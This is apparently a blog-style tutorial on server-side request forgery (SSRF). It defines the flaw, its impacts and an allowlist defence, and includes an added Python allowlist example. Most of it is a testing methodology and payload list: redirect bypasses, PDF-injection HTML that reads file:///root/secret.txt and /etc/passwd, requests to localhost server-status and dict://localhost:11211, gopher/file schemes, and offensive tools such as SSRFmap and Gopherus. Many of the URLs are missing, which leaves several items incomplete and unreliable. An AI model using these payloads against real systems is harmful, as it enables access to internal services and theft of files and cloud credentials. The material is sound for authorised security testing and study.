Server-Side Request Forgery, SSRF

Server-Side Request Forgery, SSRF for short, is a vulnerability class that describes a server making a request that is under the attacker's control. SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing.

In typical SSRF examples, the attacker might cause the server to make a connection back to itself, to other web-based services within the organisation's infrastructure, or to external third-party systems.

What are the types of SSRF?

· Blind SSRF — occurs when you never get any information about a target service from the initial request

· Semi Blind SSRF

· Non-Blind SSRF

What is the impact of SSRF attacks?

A successful SSRF attack can often result in:

· Unauthorised actions or access to data within the organisation, either in the vulnerable application itself or on other back-end systems that the application can communicate with.

· Scanning of local or external networks.

· Reading files from the server and from internal resources.

· Escalation from SSRF to reflected XSS.

· Fetching the server's metadata.

Preventing Server Side Request Forgery (SSRF)

To prevent SSRF vulnerabilities in web applications, it is strongly advised to use a whitelist of allowed domains and protocols from which the web server may fetch remote resources.
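The whitelist approach recommended above, written here as an added example (it is not code from the original post). The allowed hosts, the stub resolver and the `do_request` callback are constructed for illustration; the check also re-validates every redirect hop, because a permitted host that redirects elsewhere would otherwise defeat the list.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

# Constructed allowlist: the only schemes and hosts the server may fetch from.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_HOSTS = {"images.example.com", "cdn.example.com"}
MAX_REDIRECTS = 3


def default_resolver(host):
    """Resolve a hostname to its IP address strings with the system resolver."""
    return sorted({ai[4][0] for ai in socket.getaddrinfo(host, None)})


def is_public_ip(ip_str):
    """False for loopback, RFC 1918, link-local (cloud metadata), multicast, etc."""
    ip = ipaddress.ip_address(ip_str)
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified)


def check_url(url, resolver=default_resolver):
    """Return None if the URL may be fetched, otherwise the reason it was rejected."""
    parts = urlparse(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return "scheme not allowed: %r" % parts.scheme
    if parts.username is not None or parts.password is not None:
        return "userinfo in URL not allowed"  # rejects user@host confusion tricks
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in ALLOWED_HOSTS:
        return "host not on allowlist: %r" % host
    # Resolve and check every address: an allowed name must not point inside.
    addrs = resolver(host)
    if not addrs or not all(is_public_ip(a) for a in addrs):
        return "host resolves to a non-public address"
    return None


def fetch_with_checked_redirects(url, do_request, resolver=default_resolver):
    """Fetch url, re-checking each hop; do_request(url) -> (status, headers, body), no auto-follow."""
    for _ in range(MAX_REDIRECTS + 1):
        reason = check_url(url, resolver)
        if reason:
            raise ValueError("blocked %s: %s" % (url, reason))
        status, headers, body = do_request(url)
        if status not in (301, 302, 303, 307, 308):
            return url, body
        url = urljoin(url, headers.get("Location", ""))
    raise ValueError("too many redirects")
```

The HTTP client used for `do_request` must be configured not to follow redirects itself, otherwise the per-hop check never sees the intermediate targets.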

When should you test for SSRF?

1. If you find an open redirect, try escalating it to SSRF.

2. Grep for parameters that may be vulnerable to SSRF.

3. SSRFs are more common in APIs, so crawl the whole web app with the Burp proxy turned on and search for keywords such as ?url=, ?uri=, ?req=.

4. Sign up with an email like . If you receive an HTTP request in Collaborator, then it's SSRF. But if there's no impact, don't report it; DNS and SMTP requests don't matter.

5. Try to find blind SSRF in hidden parameters.

6. Try blind SSRF in the Referer header.

How can we perform an SSRF attack against a target application?

Some payloads for SSRF:

URL-based bypasses: \\@

Bypassing using a redirect

1. Create a page on a whitelisted host that redirects requests to the SSRF target URL (e.g.

2. Launch the SSRF pointing to ; the server will fetch YOUR_SERVER_IP, which will redirect to

Bypassing using type=url

Change "type=file" to "type=url".

Paste the URL in the text field and hit enter.

Because users can upload images from any image URL, this feature can be used to trigger an SSRF.

SSRF exploiting PDF file

<link rel=attachment href="file:///root/secret.txt">


The content of the file will be integrated inside the PDF as an image or text.

<img src="echopwn" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>



It will give something like

RESPONSE: <html><head><title>Internal admin panel</title></head>…</html>

SSRF from Referrer



User Agent: Firefox


SSRF from File-upload — redirect test for various cases

Status codes: 300, 301, 302, 303, 305, 307, 308

Filetypes: jpg, json, csv, xml, pdf

JPG 301 response without and with a valid response body:

JSON 301 response without and with a valid response body:

CSV 301 response without and with a valid response body:

XML 301 response without and with a valid response body:

PDF 301 response without and with a valid response body:


1. AWS localhost is , so don't use there!

2. If you find any SSRF vulnerability that runs on EC2, try requesting:

SSRF URL for Oracle Cloud

SSRF URL for Alibaba

A few more random payloads that might help in finding SSRF vulnerabilities.

Use the payloads below in the request:

GET /?url= HTTP/1.1

GET /?url=http://localhost/server-status HTTP/1.1

GET /?url= HTTP/1.1

GET /?url=dict://localhost:11211/stat HTTP/1.1

GET /?url=file:///etc/passwd HTTP/1.1

Schemes to try: file:///, dict://, ftp://, gopher://

{"userId": "1", "url": "http://127.0.1:513/"}

{"userId": "1", "url": ""}

Some of the tools that can be used for SSRF:

· SSRFmap —

· Gopherus —

· See-SURF —

· SSRF Sheriff —

Akash Venky